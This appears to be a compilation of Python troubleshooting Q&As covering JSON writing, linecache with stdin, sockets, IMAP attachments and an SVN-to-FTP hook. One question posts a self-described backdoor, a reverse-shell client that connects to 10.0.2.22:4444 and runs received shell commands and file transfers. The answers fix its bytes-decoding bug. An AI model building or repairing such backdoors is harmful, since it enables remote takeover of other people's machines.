Python writes empty json file

I'm working on a console app in Python. I have a command that should save the program state as a JSON file, but when I write the file, it's empty. The result of .as_list() here is a list containing an arbitrary number of 3-element lists.
class SaveCommand():
    def __init__(self, console):
        self.console = console

    def execute(self, args):
        if self.console.combat is None:
            raise ConsoleCommandException("there is no active combat")
        if len(args) != 1:
            raise ConsoleCommandException("save [save name]")
        try:
            with open("save_files/" + args[0] + ".json", "w") as outfile:
                json.dumps(self.console.combat.as_list(), outfile)
        except Exception:
            raise ConsoleCommandException("save failed: unknown error")
        print("successfully saved \"" + args[0] + "\"")

json.dumps doesn't write to a file; it returns the object serialized as a JSON string. You're looking for json.dump, which takes the file object as its second argument (dumps has no fp parameter, so nothing is ever written to outfile).
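As a minimal sketch of the corrected write inside execute() (same objects and path as the question, assuming Python 3):
import json

with open("save_files/" + args[0] + ".json", "w") as outfile:
    # json.dump serializes straight into the open file object;
    # json.dumps would only return a string and leave the file empty.
    json.dump(self.console.combat.as_list(), outfile)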

Related

Whenever I run this it gives me TypeError: can only concatenate str (not "bytes") to str and I don't know how to fix it

def reliable_receive(self):
    json_data = ""
    while True:
        try:
            json_data = json_data + self.connection.recv(1024)
            return json.loads(json_data)
        except ValueError:
            continue

def execute_system_commmand(self,command):
    return subprocess.check_output(command,shell=True)

def change_working_directory_to(self,path):
    os.chdir(path)
    return "[+] Change working directory to " + path

def write_file(self,path,content):
    with open(path,"wb") as file:
        file.write(base64.b64decode(content))
        return "[+] Upload Succesful"

def read_file(self,path):
    with open(path,"rb") as file:
        return base64.b64encode(file.read())

def run(self):
    while True:
        command = self.reliable_receive()
        try:
            if command[0] == "exit":
                self.connection.close()
                sys.exit()
            elif command[0] == "cd" and len(command) > 1:
                command_result = self.change_working_directory_to(command[1])
            elif command[0] == "download":
                command_result = self.read_file(command[1])
            elif command[0] == "upload":
                command_result = self.write_file(command[1],command[2])
            else:
                command_result = self.execute_system_commmand(command)
        except Exception:
            command_result = "[-]Error during command Execution"
        self.reliable_send(command_result)

my_backdoor = Backdoor("10.0.2.22",4444)
my_backdoor.run()
Whenever I run this it gives me TypeError: can only concatenate str (not "bytes") to str, and I don't know how to fix it. The same code runs on my virtual machine, so it's probably a silly mistake, but I just don't see it. Can you help me fix this problem?
Traceback (most recent call last):
  File "backdoor.py", line 73, in <module>
    my_backdoor.run()
  File "backdoor.py", line 50, in run
    command = self.reliable_receive()
  File "backdoor.py", line 25, in reliable_receive
    json_data = json_data + self.connection.recv(1024)
TypeError: can only concatenate str (not "bytes") to str
When sending data over a socket, the string is encoded with str.encode().
So when you receive it, it arrives as a bytes object and you must call
bytes_object.decode(encoding_used)
In your case:
json_data = json_data + self.connection.recv(1024).decode(method_used_to_encode)
method_used_to_encode is usually "utf-8".
Also make sure you do not have any variable named "str" in this scope.
PROBLEM: You initialised json_data as a str and then tried to concatenate the data returned by self.connection.recv(1024) onto it. That is not possible, because recv() returns a bytes object, and Python 3 will not concatenate bytes to a str.
SOLUTION:
def reliable_receive(self):
    while True:
        try:
            json_data = self.connection.recv(1024)
            return json.loads(json_data)  # Deserializes object from the received JSON string.
        except ValueError as e:
            print(e)  # Not sure if you need this, but without it a ValueError leaves you stuck in an infinite loop of nothingness.
This should fix your issue.
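As a minimal sketch that keeps the original accumulation loop (assuming the sender encodes its JSON as UTF-8, e.g. with json.dumps(...).encode("utf-8")):
def reliable_receive(self):
    buffer = b""  # recv() returns bytes, so accumulate bytes rather than str
    while True:
        buffer = buffer + self.connection.recv(1024)
        try:
            # decode the received bytes, then deserialize the JSON string
            return json.loads(buffer.decode("utf-8"))
        except ValueError:
            # the JSON is still incomplete; keep receiving
            continue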

python 2.6 linecache.getline() and stdin. How does it work?

I have a script which runs through lines of input to find the occurrence of an ID string while keeping track of the line number.
Then it runs backwards up the input to trace parentID/childID relationships. The script accepts either a logfile using a '-f' flag as an argument or the contents of stdin from a pipe.
The logfile as input portion works just fine, but reading from stdin seems not to work.
For the sake of reasonable clarity I've included the portion of the script that this concerns, but don't expect to be able to run it. It's just to show you sort of what's going on (anyone who works in financial services around the FIX protocol will recognize a few things):
import os
import sys
import linecache
from types import *
from ____ import FixMessage  # custom message class that is used throughout

# Feel free to ignore all the getArgs and validation crap
def getArgs():
    import argparse
    parser = argparse.ArgumentParser(
        description='Get amendment history.')
    parser.add_argument('-f', '--file',
                        help="input logfile.")
    args = parser.parse_args()
    return validateArgs(args)

def validateArgs(args):
    try:
        if sys.stdin.isatty():
            if args.file:
                assert os.path.isfile(args.file.strip('\n')), \
                    'File "{0}" does not exist'.format(args.file)
                args.file = open(args.file, 'r')
        else:
            args.file = sys.stdin
        assert args.file, \
            "Please either include a file with '-f' or pipe some text in"
    except AssertionError as err:
        print err
        exit(1)
    return args

def getMessageTrail(logfile, orderId):
    # some input validation
    if isinstance(logfile, StringType):
        try: logfile = open(logfile, 'r')
        except IOError as err: exit(1)
    elif not isinstance(logfile, FileType):
        raise TypeError(
            'Expected FileType and got {0}'.format(type(logfile)))
    linenum = 0
    # This retrieves the message containing the orderID as well as the linenum
    for line in logfile:
        linenum += 1
        if orderId in line:
            # FixMessage is a custom class that is treated here like
            # a dictionary with some metadata
            # Missing dict keys return 'None'
            # .isvalid is bool results of some text validation
            # .direction is either incoming or outgoing
            # thats all you really need to know
            msg = FixMessage(line)
            if msg.isvalid and msg.direction == 'Incoming':
                yield msg
                break
    # If there is a message parentID, it would be in msg['41']
    if msg['41']:
        messages = findParentMessages(logfile, linenum, msg['41'])
        for msg in messages: yield msg

def findParentMessages(logfile, startline, targetId):
    # Some more input validation
    assert isinstance(logfile, FileType)
    assert isinstance(startline, IntType)
    assert isinstance(targetId, StringType)
    # should just make a integer decrementing generator,
    # but this is fine for the example
    for linenum in range(startline)[::-1]:
        # *** This is where the question lies... ***
        # print(logfile.name) # returns "<stdin>"
        line = linecache.getline(logfile.name, linenum)
        if 'Incoming' in line and '11=' + targetId in line:
            msg = FixMessage(line)
            yield msg
            if msg['41']: findParentMessages(logfile, linenum, msg['41'])
            else: break

def main():
    log = getArgs().file
    trail = getMessageTrail(log, 'ORDER123')

if __name__ == '__main__': main()
The question is: how does linecache.getline work when it comes to reading stdin as a file? Is it different from how it would work if given a regular filename?
linecache.getline() accepts a file name, not a file object. It is not designed to work with stdin: the filename is passed to calls like open() and os.stat(), and "<stdin>" does not name a real file on disk, so getline() just returns an empty string.
For reference: https://github.com/python/cpython/blob/2.6/Lib/linecache.py
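One hedged workaround (my sketch, not part of the answer above): since a pipe cannot be reopened by name, read stdin into a list once and index into that list instead of calling linecache. The helper name getline_from_buffer is made up for illustration.
import sys

def getline_from_buffer(lines, linenum):
    # Mimic linecache.getline: 1-based index, '' when out of range.
    if 1 <= linenum <= len(lines):
        return lines[linenum - 1]
    return ''

# Read the piped input once up front; a file opened via -f could be
# buffered the same way before walking backwards through it.
buffered = sys.stdin.readlines()
print(getline_from_buffer(buffered, 3))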

Sending a string to client - receiving a TypeError

I'm trying to send an image to the client, so I have converted the image into a string. Here is my code:
def send_image_to_client(file_name, client_socket):
    """sends an image to the client"""
    with open(file_name, "rb") as im:
        string = base64.b64encode(im.read())  # convert image into a string
    print "sending image..."
    client_socket.send(string)
    return
For some reason, I get the following error:
send() argument 1 must be string or buffer, not None
What am I doing wrong?
This example shows the same error:
def show_content(directory, client_socket):
    """displays the content of a given directory"""
    import glob
    files_list = glob.glob(directory + "\*.*")
    files_list[-1] += "--"
    for address in files_list:
        if address:
            send_response_to_client(address + "*", client_socket)
    return
Is the above code really the code you are running, or did you do some cleanup before posting it here?
You can try this -
with open(file_name, "rb") as im:
    string = base64.b64encode(im.read())  # convert image into a string
print "sending image..."
print(type(string))
if string:
    client_socket.send(string.encode())
else:
    print("No Data received from base64encode")
return
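As a related sketch (assuming Python 2 to match the print statements above, and a hypothetical send_response_to_client helper, since the real one isn't shown), the same kind of guard catches a None argument before socket.send() raises:
def send_response_to_client(data, client_socket):
    # socket.send() only accepts a string or buffer, so fail loudly
    # if a caller passes None instead of letting send() raise later.
    if data is None:
        raise ValueError("refusing to send None to the client")
    client_socket.send(data)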

Python Script for downloading new email attachments using imap

import email
import imaplib
import os

class FetchEmail():
    connection = None
    error = None
    mail_server = "outlook.office365.com"
    username = "me@domain.com"
    password = "'Password'"
    self.save_attachment(self, msg, download_folder)

    def __init__(self, mail_server, username, password):
        self.connection = imaplib.IMAP4_SSL(mail_server)
        self.connection.login(username, password)
        self.connection.select(readonly=False)  # so we can mark mails as read

    def close_connection(self):
        """
        Close the connection to the IMAP server
        """
        self.connection.close()

    def save_attachment(self, msg, download_folder="/tmp"):
        """
        Given a message, save its attachments to the specified
        download folder (default is /tmp)
        return: file path to attachment
        """
        att_path = "No attachment found."
        for part in msg.walk():
            if part.get_content_maintype() == 'multipart':
                continue
            if part.get('Content-Disposition') is None:
                continue
            filename = part.get_filename()
            att_path = os.path.join(download_folder, filename)
            if not os.path.isfile(att_path):
                fp = open(att_path, 'wb')
                fp.write(part.get_payload(decode=True))
                fp.close()
        return att_path

    def fetch_unread_messages(self):
        """
        Retrieve unread messages
        """
        emails = []
        (result, messages) = self.connection.search(None, 'UnSeen')
        if result == "OK":
            for message in messages[0].split(' '):
                try:
                    ret, data = self.connection.fetch(message, '(RFC822)')
                except:
                    print("No new emails to read.")
                    self.close_connection()
                    exit()
                msg = email.message_from_string(data[0][1])
                if isinstance(msg, str) == False:
                    emails.append(msg)
                response, data = self.connection.store(message, '+FLAGS', '\\Seen')
            return emails
        self.error = "Failed to retreive emails."
        return emails
I currently have the above code, and at line 12 (the self.save_attachment(...) call in the class body) it says self is not defined. What could be the reason for this error? I think self is defined below that line, in the __init__ function.
Well, just by looking at the code, I can see inconsistent indentation right from the start - this is probably your main problem. Try defining your functions within the FetchEmail class.
Secondly, change the init function to:
def __init__(self, mail_server=mail_server,
             username=username,
             password=password):
this is effectively just applying default values to the init function.
Lastly, to use the save_attachment function (save_attachment(self, msg, download_folder)) within the class, you will either need to call it within the init function or within the top level of the script (outside the class definition).
Within the class definition (within init): self.save_attachment(msg, download_folder)
Within the top level: after creating a FetchEmail object using fe = FetchEmail(), you could call the save_attachment function like this: attachment_path = fe.save_attachment(msg) (see the usage sketch after the init example below).
This is how I would implement the init:
class FetchEmail():
    def __init__(self,
                 mail_server="outlook.office365.com",
                 username="me@domain.com",
                 password="'Password'"):
        self.error = None
        self.connection = None
        self.mail_server = mail_server
        self.username = username
        self.password = password
        self.connection = imaplib.IMAP4_SSL(mail_server)
        self.connection.login(username, password)
        self.connection.select(readonly=False)  # so we can mark mails as read

    def close_connection(self): ...
Just take note: if you do this, remember to change the references in all your methods to self.password, self.error, etc.
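For completeness, a minimal usage sketch at the top level of the script (my illustration, using the methods from the question's class):
# Create the object (the defaults above are used), then call its methods.
fetcher = FetchEmail()
for msg in fetcher.fetch_unread_messages():
    attachment_path = fetcher.save_attachment(msg, download_folder="/tmp")
    print(attachment_path)
fetcher.close_connection()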
I do not know whether this would work.
Maybe take a look at this. I think it is your best bet.
All the best!

Python script is exiting with no output and I have no idea why

I'm attempting to debug a Subversion post-commit hook that calls some python scripts. What I've been able to determine so far is that when I run post-commit.bat manually (I've created a wrapper for it to make it easier) everything succeeds, but when SVN runs it one particular step doesn't work.
We're using CollabNet SVNServe, which I know from the documentation removes all environment variables. This had caused some problems earlier, but shouldn't be an issue now.
Before Subversion calls a hook script, it removes all variables - including $PATH on Unix, and %PATH% on Windows - from the environment. Therefore, your script can only run another program if you spell out that program's absolute name.
The relevant portion of post-commit.bat is:
echo -------------------------- >> c:\svn-repos\company\hooks\svn2ftp.out.log
set SITENAME=staging
set SVNPATH=branches/staging/wwwroot/
"C:\Python3\python.exe" C:\svn-repos\company\hooks\svn2ftp.py ^
--svnUser="svnusername" ^
--svnPass="svnpassword" ^
--ftp-user=ftpuser ^
--ftp-password=ftppassword ^
--ftp-remote-dir=/ ^
--access-url=svn://10.0.100.6/company ^
--status-file="C:\svn-repos\company\hooks\svn2ftp-%SITENAME%.dat" ^
--project-directory=%SVNPATH% "staging.company.com" %1 %2 >> c:\svn-repos\company\hooks\svn2ftp.out.log
echo -------------------------- >> c:\svn-repos\company\hooks\svn2ftp.out.log
When I run post-commit.bat manually, for example: post-commit c:\svn-repos\company 12345, I see output like the following in svn2ftp.out.log:
--------------------------
args1: c:\svn-repos\company
args0: staging.company.com
abspath: c:\svn-repos\company
project_dir: branches/staging/wwwroot/
local_repos_path: c:\svn-repos\company
getting youngest revision...
done, up-to-date
--------------------------
However, when I commit something to the repo and it runs automatically, the output is:
--------------------------
--------------------------
svn2ftp.py is a bit long, so I apologize but here goes. I'll have some notes/disclaimers about its contents below it.
#!/usr/bin/env python
"""Usage: svn2ftp.py [OPTION...] FTP-HOST REPOS-PATH
Upload to FTP-HOST changes committed to the Subversion repository at
REPOS-PATH. Uses svn diff --summarize to only propagate the changed files
Options:
-?, --help Show this help message.
-u, --ftp-user=USER The username for the FTP server. Default: 'anonymous'
-p, --ftp-password=P The password for the FTP server. Default: '#'
-P, --ftp-port=X Port number for the FTP server. Default: 21
-r, --ftp-remote-dir=DIR The remote directory that is expected to resemble the
repository project directory
-a, --access-url=URL This is the URL that should be used when trying to SVN
export files so that they can be uploaded to the FTP
server
-s, --status-file=PATH Required. This script needs to store the last
successful revision that was transferred to the
server. PATH is the location of this file.
-d, --project-directory=DIR If the project you are interested in sending to
the FTP server is not under the root of the
repository (/), set this parameter.
Example: -d 'project1/trunk/'
This should NOT start with a '/'.
2008.5.2 CKS
Fixed possible Windows-related bug with tempfile, where the script didn't have
permission to write to the tempfile. Replaced this with a open()-created file
created in the CWD.
2008.5.13 CKS
Added error logging. Added exception for file-not-found errors when deleting files.
2008.5.14 CKS
Change file open to 'rb' mode, to prevent Python's universal newline support from
stripping CR characters, causing later comparisons between FTP and SVN to report changes.
"""
try:
import sys, os
import logging
logging.basicConfig(
level=logging.DEBUG,
format='%(asctime)s %(levelname)s %(message)s',
filename='svn2ftp.debug.log',
filemode='a'
)
console = logging.StreamHandler()
console.setLevel(logging.ERROR)
logging.getLogger('').addHandler(console)
import getopt, tempfile, smtplib, traceback, subprocess
from io import StringIO
import pysvn
import ftplib
import inspect
except Exception as e:
logging.error(e)
#capture the location of the error
frame = inspect.currentframe()
stack_trace = traceback.format_stack(frame)
logging.debug(stack_trace)
print(stack_trace)
#end capture
sys.exit(1)
#defaults
host = ""
user = "anonymous"
password = "#"
port = 21
repo_path = ""
local_repos_path = ""
status_file = ""
project_directory = ""
remote_base_directory = ""
toAddrs = "developers@company.com"
youngest_revision = ""
def email(toAddrs, message, subject, fromAddr='autonote@company.com'):
headers = "From: %s\r\nTo: %s\r\nSubject: %s\r\n\r\n" % (fromAddr, toAddrs, subject)
message = headers + message
logging.info('sending email to %s...' % toAddrs)
server = smtplib.SMTP('smtp.company.com')
server.set_debuglevel(1)
server.sendmail(fromAddr, toAddrs, message)
server.quit()
logging.info('email sent')
def captureErrorMessage(e):
sout = StringIO()
traceback.print_exc(file=sout)
errorMessage = '\n'+('*'*80)+('\n%s'%e)+('\n%s\n'%sout.getvalue())+('*'*80)
return errorMessage
def usage_and_exit(errmsg):
"""Print a usage message, plus an ERRMSG (if provided), then exit.
If ERRMSG is provided, the usage message is printed to stderr and
the script exits with a non-zero error code. Otherwise, the usage
message goes to stdout, and the script exits with a zero
errorcode."""
if errmsg is None:
stream = sys.stdout
else:
stream = sys.stderr
print(__doc__, file=stream)
if errmsg:
print("\nError: %s" % (errmsg), file=stream)
sys.exit(2)
sys.exit(0)
def read_args():
global host
global user
global password
global port
global repo_path
global local_repos_path
global status_file
global project_directory
global remote_base_directory
global youngest_revision
try:
opts, args = getopt.gnu_getopt(sys.argv[1:], "?u:p:P:r:a:s:d:SU:SP:",
["help",
"ftp-user=",
"ftp-password=",
"ftp-port=",
"ftp-remote-dir=",
"access-url=",
"status-file=",
"project-directory=",
"svnUser=",
"svnPass="
])
except getopt.GetoptError as msg:
usage_and_exit(msg)
for opt, arg in opts:
if opt in ("-?", "--help"):
usage_and_exit()
elif opt in ("-u", "--ftp-user"):
user = arg
elif opt in ("-p", "--ftp-password"):
password = arg
elif opt in ("-SU", "--svnUser"):
svnUser = arg
elif opt in ("-SP", "--svnPass"):
svnPass = arg
elif opt in ("-P", "--ftp-port"):
try:
port = int(arg)
except ValueError as msg:
usage_and_exit("Invalid value '%s' for --ftp-port." % (arg))
if port < 1 or port > 65535:
usage_and_exit("Value for --ftp-port must be a positive integer less than 65536.")
elif opt in ("-r", "--ftp-remote-dir"):
remote_base_directory = arg
elif opt in ("-a", "--access-url"):
repo_path = arg
elif opt in ("-s", "--status-file"):
status_file = os.path.abspath(arg)
elif opt in ("-d", "--project-directory"):
project_directory = arg
if len(args) != 3:
print(str(args))
usage_and_exit("host and/or local_repos_path not specified (" + len(args) + ")")
host = args[0]
print("args1: " + args[1])
print("args0: " + args[0])
print("abspath: " + os.path.abspath(args[1]))
local_repos_path = os.path.abspath(args[1])
print('project_dir:',project_directory)
youngest_revision = int(args[2])
if status_file == "" : usage_and_exit("No status file specified")
def main():
global host
global user
global password
global port
global repo_path
global local_repos_path
global status_file
global project_directory
global remote_base_directory
global youngest_revision
read_args()
#repository,fs_ptr
#get youngest revision
print("local_repos_path: " + local_repos_path)
print('getting youngest revision...')
#youngest_revision = fs.youngest_rev(fs_ptr)
assert youngest_revision, "Unable to lookup youngest revision."
last_sent_revision = get_last_revision()
if youngest_revision == last_sent_revision:
# no need to continue. we should be up to date.
print('done, up-to-date')
return
if last_sent_revision or youngest_revision < 10:
# Only compare revisions if the DAT file contains a valid
# revision number. Otherwise we risk waiting forever while
# we parse and uploading every revision in the repo in the case
# where a repository is retroactively configured to sync with ftp.
pysvn_client = pysvn.Client()
pysvn_client.callback_get_login = get_login
rev1 = pysvn.Revision(pysvn.opt_revision_kind.number, last_sent_revision)
rev2 = pysvn.Revision(pysvn.opt_revision_kind.number, youngest_revision)
summary = pysvn_client.diff_summarize(repo_path, rev1, repo_path, rev2, True, False)
print('summary len:',len(summary))
if len(summary) > 0 :
print('connecting to %s...' % host)
ftp = FTPClient(host, user, password)
print('connected to %s' % host)
ftp.base_path = remote_base_directory
print('set remote base directory to %s' % remote_base_directory)
#iterate through all the differences between revisions
for change in summary :
#determine whether the path of the change is relevant to the path that is being sent, and modify the path as appropriate.
print('change path:',change.path)
ftp_relative_path = apply_basedir(change.path)
print('ftp rel path:',ftp_relative_path)
#only try to sync path if the path is in our project_directory
if ftp_relative_path != "" :
is_file = (change.node_kind == pysvn.node_kind.file)
if str(change.summarize_kind) == "delete" :
print("deleting: " + ftp_relative_path)
try:
ftp.delete_path("/" + ftp_relative_path, is_file)
except ftplib.error_perm as e:
if 'cannot find the' in str(e) or 'not found' in str(e):
# Log, but otherwise ignore path-not-found errors
# when deleting, since it's not a disaster if the file
# we want to delete is already gone.
logging.error(captureErrorMessage(e))
else:
raise
elif str(change.summarize_kind) == "added" or str(change.summarize_kind) == "modified" :
local_file = ""
if is_file :
local_file = svn_export_temp(pysvn_client, repo_path, rev2, change.path)
print("uploading file: " + ftp_relative_path)
ftp.upload_path("/" + ftp_relative_path, is_file, local_file)
if is_file :
os.remove(local_file)
elif str(change.summarize_kind) == "normal" :
print("skipping 'normal' element: " + ftp_relative_path)
else :
raise str("Unknown change summarize kind: " + str(change.summarize_kind) + ", path: " + ftp_relative_path)
ftp.close()
#write back the last revision that was synced
print("writing last revision: " + str(youngest_revision))
set_last_revision(youngest_revision) # todo: undo
def get_login(a,b,c,d):
#arguments don't matter, we're always going to return the same thing
try:
return True, "svnUsername", "svnPassword", True
except Exception as e:
logging.error(e)
#capture the location of the error
frame = inspect.currentframe()
stack_trace = traceback.format_stack(frame)
logging.debug(stack_trace)
#end capture
sys.exit(1)
#functions for persisting the last successfully synced revision
def get_last_revision():
if os.path.isfile(status_file) :
f=open(status_file, 'r')
line = f.readline()
f.close()
try: i = int(line)
except ValueError:
i = 0
else:
i = 0
f = open(status_file, 'w')
f.write(str(i))
f.close()
return i
def set_last_revision(rev) :
f = open(status_file, 'w')
f.write(str(rev))
f.close()
#augmented ftp client class that can work off a base directory
class FTPClient(ftplib.FTP) :
def __init__(self, host, username, password) :
self.base_path = ""
self.current_path = ""
ftplib.FTP.__init__(self, host, username, password)
def cwd(self, path) :
debug_path = path
if self.current_path == "" :
self.current_path = self.pwd()
print("pwd: " + self.current_path)
if not os.path.isabs(path) :
debug_path = self.base_path + "<" + path
path = os.path.join(self.current_path, path)
elif self.base_path != "" :
debug_path = self.base_path + ">" + path.lstrip("/")
path = os.path.join(self.base_path, path.lstrip("/"))
path = os.path.normpath(path)
#by this point the path should be absolute.
if path != self.current_path :
print("change from " + self.current_path + " to " + debug_path)
ftplib.FTP.cwd(self, path)
self.current_path = path
else :
print("staying put : " + self.current_path)
def cd_or_create(self, path) :
assert os.path.isabs(path), "absolute path expected (" + path + ")"
try: self.cwd(path)
except ftplib.error_perm as e:
for folder in path.split('/'):
if folder == "" :
self.cwd("/")
continue
try: self.cwd(folder)
except:
print("mkd: (" + path + "):" + folder)
self.mkd(folder)
self.cwd(folder)
def upload_path(self, path, is_file, local_path) :
if is_file:
(path, filename) = os.path.split(path)
self.cd_or_create(path)
# Use read-binary to avoid universal newline support from stripping CR characters.
f = open(local_path, 'rb')
self.storbinary("STOR " + filename, f)
f.close()
else:
self.cd_or_create(path)
def delete_path(self, path, is_file) :
(path, filename) = os.path.split(path)
print("trying to delete: " + path + ", " + filename)
self.cwd(path)
try:
if is_file :
self.delete(filename)
else:
self.delete_path_recursive(filename)
except ftplib.error_perm as e:
if 'The system cannot find the' in str(e) or '550 File not found' in str(e):
# Log, but otherwise ignore path-not-found errors
# when deleting, since it's not a disaster if the file
# we want to delete is already gone.
logging.error(captureErrorMessage(e))
else:
raise
def delete_path_recursive(self, path):
if path == "/" :
raise "WARNING: trying to delete '/'!"
for node in self.nlst(path) :
if node == path :
#it's a file. delete and return
self.delete(path)
return
if node != "." and node != ".." :
self.delete_path_recursive(os.path.join(path, node))
try: self.rmd(path)
except ftplib.error_perm as msg :
sys.stderr.write("Error deleting directory " + os.path.join(self.current_path, path) + " : " + str(msg))
# apply the project_directory setting
def apply_basedir(path) :
#remove any leading stuff (in this case, "trunk/") and decide whether file should be propagated
if not path.startswith(project_directory) :
return ""
return path.replace(project_directory, "", 1)
def svn_export_temp(pysvn_client, base_path, rev, path) :
# Causes access denied error. Couldn't deduce Windows-perm issue.
# It's possible Python isn't garbage-collecting the open file-handle in time for pysvn to re-open it.
# Regardless, just generating a simple filename seems to work.
#(fd, dest_path) = tempfile.mkstemp()
dest_path = tmpName = '%s.tmp' % __file__
exportPath = os.path.join(base_path, path).replace('\\','/')
print('exporting %s to %s' % (exportPath, dest_path))
pysvn_client.export( exportPath,
dest_path,
force=False,
revision=rev,
native_eol=None,
ignore_externals=False,
recurse=True,
peg_revision=rev )
return dest_path
if __name__ == "__main__":
logging.info('svnftp.start')
try:
main()
logging.info('svnftp.done')
except Exception as e:
# capture the location of the error for debug purposes
frame = inspect.currentframe()
stack_trace = traceback.format_stack(frame)
logging.debug(stack_trace[:-1])
print(stack_trace)
# end capture
error_text = '\nFATAL EXCEPTION!!!\n'+captureErrorMessage(e)
subject = "ALERT: SVN2FTP Error"
message = """An Error occurred while trying to FTP an SVN commit.
repo_path = %(repo_path)s\n
local_repos_path = %(local_repos_path)s\n
project_directory = %(project_directory)s\n
remote_base_directory = %(remote_base_directory)s\n
error_text = %(error_text)s
""" % globals()
email(toAddrs, message, subject)
logging.error(e)
Notes/Disclaimers:
I have basically no python training so I'm learning as I go and spending lots of time reading docs to figure stuff out.
The body of get_login is in a try block because I was getting strange errors saying there was an unhandled exception in callback_get_login. Never figured out why, but it seems fine now. Let sleeping dogs lie, right?
The username and password for get_login are currently hard-coded (but correct) just to eliminate variables and try to change as little as possible at once. (I added the svnuser and svnpass arguments to the existing argument parsing.)
So that's where I am. I can't figure out why on earth it's not printing anything into svn2ftp.out.log. If you're wondering, the output for one of these failed attempts in svn2ftp.debug.log is:
2012-09-06 15:18:12,496 INFO svnftp.start
2012-09-06 15:18:12,496 INFO svnftp.done
And it's no different on a successful run. So there's nothing useful being logged.
I'm lost. I've gone way down the rabbit hole on this one, and don't know where to go from here. Any ideas?
It looks as if you are overriding your logging level: basicConfig sets the root logger to DEBUG, but the console handler you add only lets ERROR and above through. Try setting both to DEBUG and see what happens.
import sys, os
import logging

logging.basicConfig(
    level=logging.DEBUG,  # DEBUG here
    format='%(asctime)s %(levelname)s %(message)s',
    filename='svn2ftp.debug.log',
    filemode='a'
)
console = logging.StreamHandler()
console.setLevel(logging.ERROR)  # ERROR here
logging.getLogger('').addHandler(console)
Additionally, you are printing in some places and logging in others. The logging library does not automatically redirect sys.stdout to the logging handlers, so anything you print only goes to wherever the hook's stdout happens to be redirected, not to svn2ftp.debug.log. I would convert all print statements to logging statements to be consistent.
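For example, a minimal sketch of that change (console handler at DEBUG as well, and a print converted to a logging call):
import logging

logging.basicConfig(
    level=logging.DEBUG,
    format='%(asctime)s %(levelname)s %(message)s',
    filename='svn2ftp.debug.log',
    filemode='a'
)
console = logging.StreamHandler()
console.setLevel(logging.DEBUG)  # DEBUG here too, so nothing is filtered out
logging.getLogger('').addHandler(console)

local_repos_path = r"c:\svn-repos\company"  # example value taken from the log output above
# instead of print("local_repos_path: " + local_repos_path):
logging.debug("local_repos_path: %s", local_repos_path)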
